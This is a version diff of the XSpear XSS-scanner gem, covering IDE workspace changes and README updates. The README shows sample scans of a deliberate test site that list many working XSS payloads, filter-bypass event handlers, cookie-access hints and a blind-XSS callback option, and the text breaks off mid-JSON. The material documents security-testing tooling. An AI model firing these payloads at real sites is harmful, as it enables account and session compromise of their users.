XSpear 1.1.4 → 1.1.5

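--- a/checksums.yaml
+++ b/checksums.yaml
@@ -1,7 +1,7 @@
  ---
  SHA256:
- metadata.gz: b975c8acedef399b45b9d865d7845d76ef202d1ef19d37dd8d7314644e379537
- data.tar.gz: befb749d80ee758e96aec8809947d607c1a245af4bc41e0ec059ba305b812ebe
+ metadata.gz: cfc44f2d92f1b26e5d333eeb40c8d6ec91f18acb718a91fa034d3ca69682dbf0
+ data.tar.gz: ac964e34502fd47bad4e4eafa0e7ae58505a67de2f47d2ddce1e2606607570db
  SHA512:
- metadata.gz: e4b3d89ad70cdc1c37b095dfd0d7a5cec84057f1ffe7522ace6f8707fa6cdb53e068e7257aa7792395eea9a5e0bc225a4fa06e614a5d41fcab16c20848710884
- data.tar.gz: 39fe93dc3493aa40d91226d72668f21362d2f8dc55b014e43a0b55235a2add24b1ae5ce2a0789c310ec617e50bcc23253b2c5f5819a770c9c2b39387f58456d4
+ metadata.gz: 54837391e4c4da2517b10248cbdcb537745830ae213e8c131db450de1e5d97dd6576e15f4e76f43fd2d0f1f53f73d4b37a2c6f7521b4dff6460b9c2bb9646a74
+ data.tar.gz: 794f40198ac102353e135e30f1363af28b139c531bf1bc7da4286223230d38d9b9fa1e8d46b0371c42d50f592e763d5e4eceeb4fd44dc1ae68815df8492e8f29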
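--- a/data/.idea/workspace.xml
+++ b/data/.idea/workspace.xml
@@ -3,7 +3,9 @@
  <component name="ChangeListManager">
  <list default="true" id="4ee2e581-45d7-4c90-b6a1-e92e4b5829dd" name="Default Changelist" comment="">
  <change beforePath="$PROJECT_DIR$/.idea/workspace.xml" beforeDir="false" afterPath="$PROJECT_DIR$/.idea/workspace.xml" afterDir="false" />
+ <change beforePath="$PROJECT_DIR$/README.md" beforeDir="false" afterPath="$PROJECT_DIR$/README.md" afterDir="false" />
  <change beforePath="$PROJECT_DIR$/lib/XSpear.rb" beforeDir="false" afterPath="$PROJECT_DIR$/lib/XSpear.rb" afterDir="false" />
+ <change beforePath="$PROJECT_DIR$/lib/XSpear/version.rb" beforeDir="false" afterPath="$PROJECT_DIR$/lib/XSpear/version.rb" afterDir="false" />
  </list>
  <option name="EXCLUDED_CONVERTED_TO_IGNORED" value="true" />
  <option name="SHOW_DIALOG" value="false" />
@@ -16,23 +18,23 @@
  </component>
  <component name="FileEditorManager">
  <leaf SIDE_TABS_SIZE_LIMIT_KEY="300">
- <file pinned="false" current-in-tab="false">
+ <file pinned="false" current-in-tab="true">
  <entry file="file://$PROJECT_DIR$/README.md">
  <provider selected="true" editor-type-id="split-provider[text-editor;markdown-preview-editor]">
  <state split_layout="SPLIT">
- <first_editor relative-caret-position="407">
- <caret line="243" column="42" lean-forward="true" selection-start-line="243" selection-start-column="42" selection-end-line="243" selection-end-column="42" />
+ <first_editor relative-caret-position="180">
+ <caret line="12" column="72" selection-start-line="12" selection-start-column="72" selection-end-line="12" selection-end-column="72" />
  </first_editor>
  <second_editor />
  </state>
  </provider>
  </entry>
  </file>
- <file pinned="false" current-in-tab="true">
+ <file pinned="false" current-in-tab="false">
  <entry file="file://$PROJECT_DIR$/lib/XSpear.rb">
  <provider selected="true" editor-type-id="text-editor">
- <state relative-caret-position="256">
- <caret line="508" column="107" lean-forward="true" selection-start-line="508" selection-start-column="107" selection-end-line="508" selection-end-column="107" />
+ <state relative-caret-position="134">
+ <caret line="76" column="9" lean-forward="true" selection-start-line="76" selection-start-column="9" selection-end-line="76" selection-end-column="9" />
  </state>
  </provider>
  </entry>
@@ -113,10 +115,10 @@
  <option value="$PROJECT_DIR$/XSpear.gemspec" />
  <option value="$PROJECT_DIR$/exe/XSpear" />
  <option value="$PROJECT_DIR$/lib/XSpear/banner.rb" />
- <option value="$PROJECT_DIR$/lib/XSpear/version.rb" />
  <option value="$PROJECT_DIR$/lib/XSpear/XSpearRepoter.rb" />
- <option value="$PROJECT_DIR$/README.md" />
+ <option value="$PROJECT_DIR$/lib/XSpear/version.rb" />
  <option value="$PROJECT_DIR$/lib/XSpear.rb" />
+ <option value="$PROJECT_DIR$/README.md" />
  </list>
  </option>
  </component>
@@ -233,21 +235,7 @@
  <workItem from="1563809961097" duration="4237000" />
  <workItem from="1563893538891" duration="11917000" />
  <workItem from="1564151699165" duration="2494000" />
- <workItem from="1564413097342" duration="6632000" />
- </task>
- <task id="LOCAL-00007" summary="edit gem dependency(runtime, developement)">
- <created>1563202364398</created>
- <option name="number" value="00007" />
- <option name="presentableId" value="LOCAL-00007" />
- <option name="project" value="LOCAL" />
- <updated>1563202364398</updated>
- </task>
- <task id="LOCAL-00008" summary="Edit readme">
- <created>1563202539755</created>
- <option name="number" value="00008" />
- <option name="presentableId" value="LOCAL-00008" />
- <option name="project" value="LOCAL" />
- <updated>1563202539755</updated>
+ <workItem from="1564413097342" duration="8852000" />
  </task>
  <task id="LOCAL-00009" summary="Edit readme">
  <created>1563202605282</created>
@@ -578,11 +566,34 @@
  <option name="project" value="LOCAL" />
  <updated>1565281795460</updated>
  </task>
- <option name="localTasksCounter" value="56" />
+ <task id="LOCAL-00056" summary="(1.1.4) [Fixed #19] Add http.code, message log, edit log format on verbose=3">
+ <created>1565283137057</created>
+ <option name="number" value="00056" />
+ <option name="presentableId" value="LOCAL-00056" />
+ <option name="project" value="LOCAL" />
+ <updated>1565283137057</updated>
+ </task>
+ <task id="LOCAL-00057" summary="(1.1.4) Released 1.1.4">
+ <created>1565283263992</created>
+ <option name="number" value="00057" />
+ <option name="presentableId" value="LOCAL-00057" />
+ <option name="project" value="LOCAL" />
+ <updated>1565283263992</updated>
+ </task>
+ <option name="localTasksCounter" value="58" />
  <servers />
  </component>
  <component name="TimeTrackingManager">
- <option name="totallyTimeSpent" value="45602000" />
+ <option name="totallyTimeSpent" value="47822000" />
+ </component>
+ <component name="TodoView">
+ <todo-panel id="selected-file">
+ <is-autoscroll-to-source value="true" />
+ </todo-panel>
+ <todo-panel id="all">
+ <are-packages-shown value="true" />
+ <is-autoscroll-to-source value="true" />
+ </todo-panel>
  </component>
  <component name="ToolWindowManager">
  <frame x="-1920" y="-643" width="1920" height="1080" extended-state="0" />
@@ -597,11 +608,11 @@
  <window_info anchor="bottom" id="Debug" order="3" weight="0.4" />
  <window_info anchor="bottom" id="Cvs" order="4" weight="0.25" />
  <window_info anchor="bottom" id="Inspection" order="5" weight="0.4" />
- <window_info anchor="bottom" id="TODO" order="6" />
+ <window_info anchor="bottom" id="TODO" order="6" weight="0.32970297" />
  <window_info anchor="bottom" id="Docker" order="7" show_stripe_button="false" />
  <window_info anchor="bottom" id="Database Changes" order="8" />
  <window_info anchor="bottom" id="Version Control" order="9" />
- <window_info active="true" anchor="bottom" id="Terminal" order="10" visible="true" weight="0.32277226" />
+ <window_info active="true" anchor="bottom" id="Terminal" order="10" visible="true" weight="0.34059405" />
  <window_info anchor="bottom" id="Event Log" order="11" side_tool="true" />
  <window_info anchor="bottom" id="Messages" order="12" weight="0.32953367" />
  <window_info anchor="right" id="Commander" internal_type="SLIDING" order="0" type="SLIDING" weight="0.4" />
@@ -614,8 +625,6 @@
  <option name="version" value="1" />
  </component>
  <component name="VcsManagerConfiguration">
- <MESSAGE value="(1.0.6)[fixed #6] Edit Static Analysis code" />
- <MESSAGE value="(1.0.6)[fixed #7] CallbackNotAdded 쪽 분기문 수정" />
  <MESSAGE value="(1.0.6)[fixed #4] Report 객체 수정" />
  <MESSAGE value="(1.0.6)[fixed #8] Added response header analysis module" />
  <MESSAGE value="(1.0.6)[fixed #9] Added method in report-cli" />
@@ -639,7 +648,9 @@
  <MESSAGE value="(1.1.2) Releases &amp; Fixed #17 (Add some event handlers..)" />
  <MESSAGE value="(1.1.3) Releases &amp; Fixed #18 (Add onload* event handler)" />
  <MESSAGE value="(1.1.4) [Fixed #20 #22] Modified JSON Format&amp;Remove Color in XSpearReporter" />
- <option name="LAST_COMMIT_MESSAGE" value="(1.1.4) [Fixed #20 #22] Modified JSON Format&amp;Remove Color in XSpearReporter" />
+ <MESSAGE value="(1.1.4) [Fixed #19] Add http.code, message log, edit log format on verbose=3" />
+ <MESSAGE value="(1.1.4) Released 1.1.4" />
+ <option name="LAST_COMMIT_MESSAGE" value="(1.1.4) Released 1.1.4" />
  </component>
  <component name="editorHistoryManager">
  <entry file="file://$USER_HOME$/.rvm/gems/ruby-2.4.6/gems/bundler-2.0.1/lib/bundler/rubygems_integration.rb">
@@ -692,23 +703,6 @@
  </state>
  </provider>
  </entry>
- <entry file="file://$PROJECT_DIR$/lib/XSpear/version.rb">
- <provider selected="true" editor-type-id="text-editor">
- <state relative-caret-position="15">
- <caret line="1" column="18" selection-start-line="1" selection-start-column="18" selection-end-line="1" selection-end-column="18" />
- </state>
- </provider>
- </entry>
- <entry file="file://$PROJECT_DIR$/README.md">
- <provider selected="true" editor-type-id="split-provider[text-editor;markdown-preview-editor]">
- <state split_layout="SPLIT">
- <first_editor relative-caret-position="407">
- <caret line="243" column="42" lean-forward="true" selection-start-line="243" selection-start-column="42" selection-end-line="243" selection-end-column="42" />
- </first_editor>
- <second_editor />
- </state>
- </provider>
- </entry>
  <entry file="file://$PROJECT_DIR$/lib/XSpear/XSpearRepoter.rb">
  <provider selected="true" editor-type-id="text-editor">
  <state relative-caret-position="-61">
@@ -723,10 +717,27 @@
  </state>
  </provider>
  </entry>
+ <entry file="file://$PROJECT_DIR$/lib/XSpear/version.rb">
+ <provider selected="true" editor-type-id="text-editor">
+ <state relative-caret-position="15">
+ <caret line="1" column="18" selection-start-line="1" selection-start-column="18" selection-end-line="1" selection-end-column="18" />
+ </state>
+ </provider>
+ </entry>
  <entry file="file://$PROJECT_DIR$/lib/XSpear.rb">
  <provider selected="true" editor-type-id="text-editor">
- <state relative-caret-position="256">
- <caret line="508" column="107" lean-forward="true" selection-start-line="508" selection-start-column="107" selection-end-line="508" selection-end-column="107" />
+ <state relative-caret-position="134">
+ <caret line="76" column="9" lean-forward="true" selection-start-line="76" selection-start-column="9" selection-end-line="76" selection-end-column="9" />
+ </state>
+ </provider>
+ </entry>
+ <entry file="file://$PROJECT_DIR$/README.md">
+ <provider selected="true" editor-type-id="split-provider[text-editor;markdown-preview-editor]">
+ <state split_layout="SPLIT">
+ <first_editor relative-caret-position="180">
+ <caret line="12" column="72" selection-start-line="12" selection-start-column="72" selection-end-line="12" selection-end-column="72" />
+ </first_editor>
+ <second_editor />
  </state>
  </provider>
  </entry>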
data/README.md CHANGED
@@ -10,7 +10,7 @@ XSpear is XSS Scanner on ruby gems
10
10
  - Detect `alert` `confirm` `prompt` event on headless browser (with Selenium)
11
11
  - Testing request/response for XSS protection bypass and reflected params<br>
12
12
  + Reflected Params
13
- + Filtered test `event handler` `HTML tag` `Special Char`
13
+ + Filtered test `event handler` `HTML tag` `Special Char` `Useful code`
14
14
  - Testing Blind XSS (with XSS Hunter , ezXSS, HBXSS, Etc all url base blind test...)
15
15
  - Dynamic/Static Analysis
16
16
  + Find SQL Error pattern
@@ -97,7 +97,7 @@ $ ruby a.rb -u 'https://www.hahwul.com/?q=123' --cookie='role=admin'
97
97
  $ xspear -u "http://testphp.vulnweb.com/search.php?test=query" -d "searchFor=yy"
98
98
  ```
99
99
 
100
- **json output**
100
+ **json output(with silence mode)**
101
101
  ```
102
102
  $ xspear -u "http://testphp.vulnweb.com/search.php?test=query" -d "searchFor=yy" -o json -v 1
103
103
  ```
@@ -117,9 +117,12 @@ $ xspear -u "http://testphp.vulnweb.com/search.php?test=query" -t 30
117
117
  $ xspear -u "http://testphp.vulnweb.com/search.php?test=query&cat=123&ppl=1fhhahwul" -p cat,test
118
118
  ```
119
119
 
120
- **testing blind xss**
120
+ **testing blind xss**<br>
121
+ (Should be used as much as possible because Blind XSS is everywhere)<br>
121
122
  ```
122
123
  $ xspear -u "http://testphp.vulnweb.com/search.php?test=query" -b "https://hahwul.xss.ht"
124
+
125
+ # Set your blind xss host. <-b options>
123
126
  ```
124
127
 
125
128
  etc...
@@ -139,75 +142,89 @@ __((_)(_)) /(/( /((_))(_))(()\
139
142
  |_| \ /<
140
143
  {\\\\\\\\\\\\\BYHAHWUL\\\\\\\\\\\(0):::<======================-
141
144
  / \<
142
- \> [ v1.0.7 ]
143
- [*] creating a test query.
144
- [*] test query generation is complete. [149 query]
145
- [*] starting test and analysis. [10 threads]
146
- [I] [00:37:34] reflected 'XsPeaR
147
- [-] [00:37:34] 'cat' Not reflected |XsPeaR
148
- [I] [00:37:34] [param: cat][Found SQL Error Pattern]
149
- [-] [00:37:34] 'STATIC' not reflected
150
- [I] [00:37:34] reflected "XsPeaR
151
- [-] [00:37:34] 'cat' Not reflected ;XsPeaR
152
- [I] [00:37:34] reflected `XsPeaR
153
- ...snip...
154
- [H] [00:37:44] reflected "><iframe/src=JavaScriPt:alert(45)>[param: cat][reflected XSS Code]
155
- [-] [00:37:44] 'cat' not reflected <img/src onerror=alert(45)>
156
- [-] [00:37:44] 'cat' not reflected <svg/onload=alert(45)>
157
- [-] [00:37:49] 'cat' not found alert/prompt/confirm event '"><svg/onload=alert(45)>
158
- [-] [00:37:49] 'cat' not found alert/prompt/confirm event '"><svg/onload=alert(45)>
159
- [-] [00:37:50] 'cat' not found alert/prompt/confirm event <xmp><p title="</xmp><svg/onload=alert(45)>">
160
- [-] [00:37:51] 'cat' not found alert/prompt/confirm event '"><svg/onload=alert(45)>
161
- [V] [00:37:51] found alert/prompt/confirm (45) in selenium!! <script>alert(45)</script>
162
- => [param: cat][triggered <script>alert(45)</script>]
163
- [V] [00:37:51] found alert/prompt/confirm (45) in selenium!! '"><svg/onload=alert(45)>
164
- => [param: cat][triggered <svg/onload=alert(45)>]
145
+ \> [ v1.1.5 ]
146
+ [*] analysis request..
147
+ [-] [23:50:35] [200/OK] 'zfdfasdf' not reflected rEfe6
148
+ [-] [23:50:35] [200/OK] 'cat' not reflected <script>alert(45)</script>
149
+ [I] [23:50:35] [200/OK] [param: cat][Found SQL Error Pattern]
150
+ [-] [23:50:35] [200/OK] 'zfdfasdf' not reflected <script>alert(45)</script>
151
+ [-] [23:50:35] [200/OK] 'STATIC' not reflected
152
+ [I] [23:50:35] [200/OK] reflected rEfe6[param: cat][reflected parameter]
153
+ [*] creating a test query [for reflected 2 param + blind xss ]
154
+ [*] test query generation is complete. [192 query]
155
+ [*] starting XSS Scanning. [10 threads]
156
+ ..snip..
157
+ [I] [23:50:47] [200/OK] reflected xsp<frameset>
158
+ [I] [23:50:47] [200/OK] reflected xsp<applet>
159
+ [I] [23:50:48] [200/OK] reflected document.cookie.xspear
160
+ [I] [23:50:48] [200/OK] reflected document.location.xspear
161
+ [-] [23:50:48] [200/OK] 'cat' not reflected <svg/onload=alert(45)>
162
+ [H] [23:50:50] [200/OK] reflected <keygen autofocus onfocus=alert(45)>[param: cat][reflected onfocus XSS Code]
163
+ [-] [23:50:55] [200/OK] 'cat' not found alert/prompt/confirm event <xmp><p title="</xmp><svg/onload=alert(45)>">
164
+ [V] [23:50:56] [200/OK] found alert/prompt/confirm (45) in selenium!! <script>alert(45)</script>[param: cat][triggered <script>alert(45)</script>]
165
+ [H] [23:50:56] [200/OK] found alert/prompt/confirm (45) in selenium!! <marquee onstart=alert(45)>[param: cat][triggered <marquee onstart=alert(45)>]
166
+ [H] [23:50:57] [200/OK] found alert/prompt/confirm (45) in selenium!! <details/open/ontoggle="alert(45)">[param: cat][triggered <details/open/ontoggle="alert(45)">]
167
+ [H] [23:50:58] [200/OK] found alert/prompt/confirm (45) in selenium!! <audio src onloadstart=alert(45)>[param: cat][triggered <audio src onloadstart=alert(45)>]
168
+ [-] [23:50:59] [200/OK] 'cat' not found alert/prompt/confirm event '"><svg/onload=alert(45)>
169
+ [-] [23:50:59] [200/OK] 'cat' not found alert/prompt/confirm event <svg(0x0c)onload=alert(1)>
170
+ [V] [23:51:00] [200/OK] found alert/prompt/confirm (45) in selenium!! '"><svg/onload=alert(45)>[param: cat][triggered <svg/onload=alert(45)>]
171
+ ...snip..
165
172
  [*] finish scan. the report is being generated..
166
- +----+-------+------------------+--------+-------+-------------------------------------+--------------------------------------------+
167
- | [ XSpear report ] |
168
- | http://testphp.vulnweb.com/listproducts.php?cat=z |
169
- | 2019-07-24 00:37:33 +0900 ~ 2019-07-24 00:37:51 +0900 Found 12 issues. |
170
- +----+-------+------------------+--------+-------+-------------------------------------+--------------------------------------------+
171
- | NO | TYPE | ISSUE | METHOD | PARAM | PAYLOAD | DESCRIPTION |
172
- +----+-------+------------------+--------+-------+-------------------------------------+--------------------------------------------+
173
- | 0 | INFO | DYNAMIC ANALYSIS | GET | cat | XsPeaR" | Found SQL Error Pattern |
174
- | 1 | INFO | STATIC ANALYSIS | GET | - | original query | Found Server: nginx/1.4.1 |
175
- | 2 | INFO | STATIC ANALYSIS | GET | - | original query | Not set HSTS |
176
- | 3 | INFO | STATIC ANALYSIS | GET | - | original query | Content-Type: text/html |
177
- | 4 | LOW | STATIC ANALYSIS | GET | - | original query | Not Set X-Frame-Options |
178
- | 5 | MIDUM | STATIC ANALYSIS | GET | - | original query | Not Set CSP |
179
- | 6 | INFO | REFLECTED | GET | cat | rEfe6 | reflected parameter |
180
- | 7 | INFO | FILERD RULE | GET | cat | onhwul=64 | not filtered event handler on{any} pattern |
181
- | 8 | HIGH | XSS | GET | cat | <script>alert(45)</script> | reflected XSS Code |
182
- | 9 | HIGH | XSS | GET | cat | "><iframe/src=JavaScriPt:alert(45)> | reflected XSS Code |
183
- | 10 | VULN | XSS | GET | cat | <script>alert(45)</script> | triggered <script>alert(45)</script> |
184
- | 11 | VULN | XSS | GET | cat | '"><svg/onload=alert(45)> | triggered <svg/onload=alert(45)> |
185
- +----+-------+------------------+--------+-------+-------------------------------------+--------------------------------------------+
173
+ +----+-------+------------------+--------+-------+----------------------------------------+-----------------------------------------------+
174
+ | [ XSpear report ] |
175
+ | http://testphp.vulnweb.com/listproducts.php?cat=123&zfdfasdf=124fff... (snip) |
176
+ | 2019-08-14 23:50:34 +0900 ~ 2019-08-14 23:51:07 +0900 Found 24 issues. |
177
+ +----+-------+------------------+--------+-------+----------------------------------------+-----------------------------------------------+
178
+ | NO | TYPE | ISSUE | METHOD | PARAM | PAYLOAD | DESCRIPTION |
179
+ +----+-------+------------------+--------+-------+----------------------------------------+-----------------------------------------------+
180
+ | 0 | INFO | STATIC ANALYSIS | GET | - | <original query> | Found Server: nginx/1.4.1 |
181
+ | 1 | INFO | STATIC ANALYSIS | GET | - | <original query> | Not set HSTS |
182
+ | 2 | INFO | STATIC ANALYSIS | GET | - | <original query> | Content-Type: text/html |
183
+ | 3 | LOW | STATIC ANALYSIS | GET | - | <original query> | Not Set X-Frame-Options |
184
+ | 4 | MIDUM | STATIC ANALYSIS | GET | - | <original query> | Not Set CSP |
185
+ | 5 | INFO | DYNAMIC ANALYSIS | GET | cat | XsPeaR" | Found SQL Error Pattern |
186
+ | 6 | INFO | REFLECTED | GET | cat | rEfe6 | reflected parameter |
187
+ | 7 | INFO | FILERD RULE | GET | cat | onhwul=64 | not filtered event handler on{any} pattern |
188
+ | 8 | HIGH | XSS | GET | cat | <script>alert(45)</script> | reflected XSS Code |
189
+ | 9 | HIGH | XSS | GET | cat | <marquee onstart=alert(45)> | reflected HTML5 XSS Code |
190
+ | 10 | HIGH | XSS | GET | cat | <details/open/ontoggle="alert`45`"> | reflected HTML5 XSS Code |
191
+ | 11 | HIGH | XSS | GET | cat | <select autofocus onfocus=alert(45)> | reflected onfocus XSS Code |
192
+ | 12 | HIGH | XSS | GET | cat | <input autofocus onfocus=alert(45)> | reflected onfocus XSS Code |
193
+ | 13 | HIGH | XSS | GET | cat | <textarea autofocus onfocus=alert(45)> | reflected onfocus XSS Code |
194
+ | 14 | HIGH | XSS | GET | cat | <audio src onloadstart=alert(45)> | reflected HTML5 XSS Code |
195
+ | 15 | HIGH | XSS | GET | cat | <meter onmouseover=alert(45)>0</meter> | reflected HTML5 XSS Code |
196
+ | 16 | HIGH | XSS | GET | cat | "><iframe/src=JavaScriPt:alert(45)> | reflected XSS Code |
197
+ | 17 | HIGH | XSS | GET | cat | <video/poster/onerror=alert(45)> | reflected HTML5 XSS Code |
198
+ | 18 | HIGH | XSS | GET | cat | <keygen autofocus onfocus=alert(45)> | reflected onfocus XSS Code |
199
+ | 19 | VULN | XSS | GET | cat | <script>alert(45)</script> | triggered <script>alert(45)</script> |
200
+ | 20 | HIGH | XSS | GET | cat | <marquee onstart=alert(45)> | triggered <marquee onstart=alert(45)> |
201
+ | 21 | HIGH | XSS | GET | cat | <details/open/ontoggle="alert(45)"> | triggered <details/open/ontoggle="alert(45)"> |
202
+ | 22 | HIGH | XSS | GET | cat | <audio src onloadstart=alert(45)> | triggered <audio src onloadstart=alert(45)> |
203
+ | 23 | VULN | XSS | GET | cat | '"><svg/onload=alert(45)> | triggered <svg/onload=alert(45)> |
204
+ +----+-------+------------------+--------+-------+----------------------------------------+-----------------------------------------------+
186
205
  < Available Objects >
187
206
  [cat] param
188
- + Available Special Char: ' \ ` ) [ } : . { ] $
189
- + Available Event Handler: "onActivate","onBeforeActivate","onAfterUpdate","onAbort","onAfterPrint","onBeforeCopy","onBeforeCut","onBeforePaste","onBlur","onBeforePrint","onBeforeDeactivate","onBeforeUpdate","onBeforeEditFocus","onBegin","onBeforeUnload","onBounce","onDataSetChanged","onCellChange","onClick","onDataAvailable","onChange","onContextMenu","onCopy","onControlSelect","onDataSetComplete","onCut","onDragStart","onDragEnter","onDragOver","onDblClick","onDragEnd","onDrop","onDeactivate","onDragLeave","onDrag","onDragDrop","onHashChange","onFocusOut","onFilterChange","onEnd","onFocus","onHelp","onErrorUpdate","onFocusIn","onFinish","onError","onLayoutComplete","onKeyDown","onKeyUp","onMediaError","onLoad","onMediaComplete","onInput","onKeyPress","onloadstart","onLoseCapture","onMouseOut","onMouseDown","onMouseWheel","onMove","onMouseLeave","onMessage","onMouseEnter","onMouseMove","onMouseOver","onMouseUp","onPropertyChange","onMoveStart","onProgress","onPopState","onPaste","onOnline","onMoveEnd","onPause","onOutOfSync","onOffline","onReverse","onResize","onRedo","onRowsEnter","onRepeat","onReset","onResizeEnd","onResizeStart","onReadyStateChange","onResume","onRowInserted","onStart","onScroll","onRowExit","onSelectionChange","onSeek","onStop","onRowDelete","onSelectStart","onSelect","ontouchstart","ontouchend","onTrackChange","onSyncRestored","onTimeError","onUndo","onURLFlip","onStorage","onUnload","onSubmit","ontouchmove"
190
- + Available HTML Tag: "meta","video","iframe","embed","script","audio","svg","object","img","frameset","applet","style","frame"
207
+ + Available Special Char: ` ( \ ' { ) } [ : $ ]
208
+ + Available Event Handler: "onBeforeEditFocus","onAbort","onActivate","onAfterUpdate","onBeforeCopy","onAfterPrint","onBeforeActivate","onBeforeCut","onBeforeDeactivate","onChange","onBeforePrint","onBounce","onBeforeUnload","onCellChange","onBeforePaste","onClick","onBegin","onBlur","onBeforeUpdate","onDataSetChanged","onCut","onDblClick","onCopy","onContextMenu","onDataSetComplete","onDeactivate","onDataAvailable","onControlSelect","onDrag","onDrop","onDragEnd","onEnd","onDragLeave","onDragStart","onDragOver","onDragEnter","onDragDrop","onError","onErrorUpdate","onFinish","onFilterChange","onKeyPress","onHelp","onFocus","onInput","onHashChange","onKeyDown","onFocusIn","onFocusOut","onMessage","onMouseDown","onLoad","onLayoutComplete","onMouseEnter","onLoseCapture","onloadstart","onMediaError","onKeyUp","onMediaComplete","onMouseOver","onMouseWheel","onMove","onMouseMove","onMouseOut","onOffline","onMoveStart","onMouseLeave","onMouseUp","onMoveEnd","onPropertyChange","onOnline","onPause","onPaste","onReadyStateChange","onRedo","onProgress","onPopState","onOutOfSync","onRepeat","onResume","onRowExit","onReset","onResizeEnd","onRowsEnter","onResizeStart","onReverse","onRowDelete","onRowInserted","onResize","onStop","onSeek","onSelect","onSubmit","onStorage","onStart","onScroll","onSelectionChange","onSyncRestored","onSelectStart","onUnload","ontouchstart","onbeforescriptexecute","onTimeError","onURLFlip","ontouchmove","ontouchend","onTrackChange","onUndo","onafterscriptexecute","onpointermove","onpointerleave","onpointerup","onpointerover","onpointerdown","onpointerenter","onloadstart","onloadend","onpointerout"
209
+ + Available HTML Tag: "script","img","embed","video","audio","meta","style","frame","iframe","svg","object","frameset","applet"
191
210
  + Available Useful Code: "document.cookie","document.location","window.location"
211
+
192
212
  < Raw Query >
193
- [0] http://testphp.vulnweb.com/listproducts.php?cat=z?cat=zXsPeaR%22
194
- [1] http://testphp.vulnweb.com/listproducts.php?cat=z?-
195
- [2] http://testphp.vulnweb.com/listproducts.php?cat=z?-
196
- [3] http://testphp.vulnweb.com/listproducts.php?cat=z?-
197
- [4] http://testphp.vulnweb.com/listproducts.php?cat=z?-
198
- [5] http://testphp.vulnweb.com/listproducts.php?cat=z?-
199
- [6] http://testphp.vulnweb.com/listproducts.php?cat=z?cat=zrEfe6
200
- [7] http://testphp.vulnweb.com/listproducts.php?cat=z?cat=z%5C%22%3E%3Cxspear+onhwul%3D64%3E
201
- [8] http://testphp.vulnweb.com/listproducts.php?cat=z?cat=z%22%3E%3Cscript%3Ealert%2845%29%3C%2Fscript%3E
202
- [9] http://testphp.vulnweb.com/listproducts.php?cat=z?cat=z%22%3E%3Ciframe%2Fsrc%3DJavaScriPt%3Aalert%2845%29%3E
203
- [10] http://testphp.vulnweb.com/listproducts.php?cat=z?cat=z%22%3E%3Cscript%3Ealert%2845%29%3C%2Fscript%3E
204
- [11] http://testphp.vulnweb.com/listproducts.php?cat=z?cat=z%27%22%3E%3Csvg%2Fonload%3Dalert%2845%29%3E
213
+ [0] http://testphp.vulnweb.com/listproducts.php?-
214
+ ..snip..
215
+ [19] http://testphp.vulnweb.com/listproducts.php?cat=123%22%3E%3Cscript%3Ealert(45)%3C/script%3E&zfdfasdf=124fffff
216
+ [20] http://testphp.vulnweb.com/listproducts.php?cat=123%22'%3E%3Cmarquee%20onstart=alert(45)%3E&zfdfasdf=124fffff
217
+ [21] http://testphp.vulnweb.com/listproducts.php?cat=123%22'%3E%3Cdetails/open/ontoggle=%22alert(45)%22%3E&zfdfasdf=124fffff
218
+ [22] http://testphp.vulnweb.com/listproducts.php?cat=123%22'%3E%3Caudio%20src%20onloadstart=alert(45)%3E&zfdfasdf=124fffff
219
+ [23] http://testphp.vulnweb.com/listproducts.php?cat=123'%22%3E%3Csvg/onload=alert(45)%3E&zfdfasdf=124fffff
220
+
221
+ ...snip...
205
222
  ```
206
223
 
207
224
  **to JSON**
208
225
  ```
209
- $ xspear -u "http://testphp.vulnweb.com/search.php?test=query" -d "searchFor=yy" -o json -v 1
210
- {"starttime":"2019-08-09 01:26:32 +0900","endtime":"2019-08-09 01:27:04 +0900","issue_count":25,"issue_list":[{"id":0,"type":"INFO","issue":"REFLECTED","method":"GET","param":"cat","payload":"rEfe6","description":"reflected parameter"},{"id":1,"type":"INFO","issue":"STATIC ANALYSIS","method":"GET","param":"-","payload":"<original query>","description":"Found Server: nginx/1.4.1"},{"id":2,"type":"INFO","issue":"STATIC ANALYSIS","method":"GET","param":"-","payload":"<original query>","description":"Not set HSTS"},{"id":3,"type":"INFO","issue":"STATIC ANALYSIS","method":"GET","param":"-","payload":"<original query>","description":"Content-Type: text/html"},{"id":4,"type":"LOW","issue":"STATIC ANALYSIS","method":"GET","param":"-","payload":"<original query>","description":"Not Set X-Frame-Options"},{"id":5,"type":"MIDUM","issue":"STATIC ANALYSIS","method":"GET","param":"-","payload":"<original query>","description":"Not Set CSP"},{"id":6,"type":"INFO","issue":"DYNAMIC ANALYSIS","method":"GET","param":"cat","payload":"XsPeaR\"","description":"Found SQL Error Pattern"},{"id":7,"type":"INFO","issue":"FILERD RULE","method":"GET","param":"cat","payload":"onhwul=64","description":"not filtered event handler on{any} pattern"},{"id":8,"type":"HIGH","issue":"XSS","method":"GET","param":"cat","payload":"<script>alert(45)</script>","description":"reflected XSS Code"},{"id":9,"type":"HIGH","issue":"XSS","method":"GET","param":"cat","payload":"<details/open/ontoggle=\"alert`45`\">","description":"reflected HTML5 XSS Code"},{"id":10,"type":"HIGH","issue":"XSS","method":"GET","param":"cat","payload":"<marquee onstart=alert(45)>","description":"reflected HTML5 XSS Code"},{"id":11,"type":"HIGH","issue":"XSS","method":"GET","param":"cat","payload":"<video/poster/onerror=alert(45)>","description":"reflected HTML5 XSS Code"},{"id":12,"type":"HIGH","issue":"XSS","method":"GET","param":"cat","payload":"<audio src onloadstart=alert(45)>","description":"reflected HTML5 XSS 
Code"},{"id":13,"type":"HIGH","issue":"XSS","method":"GET","param":"cat","payload":"\"><iframe/src=JavaScriPt:alert(45)>","description":"reflected XSS Code"},{"id":14,"type":"HIGH","issue":"XSS","method":"GET","param":"cat","payload":"<keygen autofocus onfocus=alert(45)>","description":"reflected onfocus XSS Code"},{"id":15,"type":"HIGH","issue":"XSS","method":"GET","param":"cat","payload":"<meter onmouseover=alert(45)>0</meter>","description":"reflected HTML5 XSS Code"},{"id":16,"type":"HIGH","issue":"XSS","method":"GET","param":"cat","payload":"<select autofocus onfocus=alert(45)>","description":"reflected onfocus XSS Code"},{"id":17,"type":"HIGH","issue":"XSS","method":"GET","param":"cat","payload":"<textarea autofocus onfocus=alert(45)>","description":"reflected onfocus XSS Code"},{"id":18,"type":"HIGH","issue":"XSS","method":"GET","param":"cat","payload":"<input autofocus onfocus=alert(45)>","description":"reflected onfocus XSS Code"},{"id":19,"type":"VULN","issue":"XSS","method":"GET","param":"cat","payload":"<svg(0x0c)onload=alert(1)>","description":"triggered <svg(0x0c)onload=alert(1)>"},{"id":20,"type":"VULN","issue":"XSS","method":"GET","param":"cat","payload":"<script>alert(45)</script>","description":"triggered 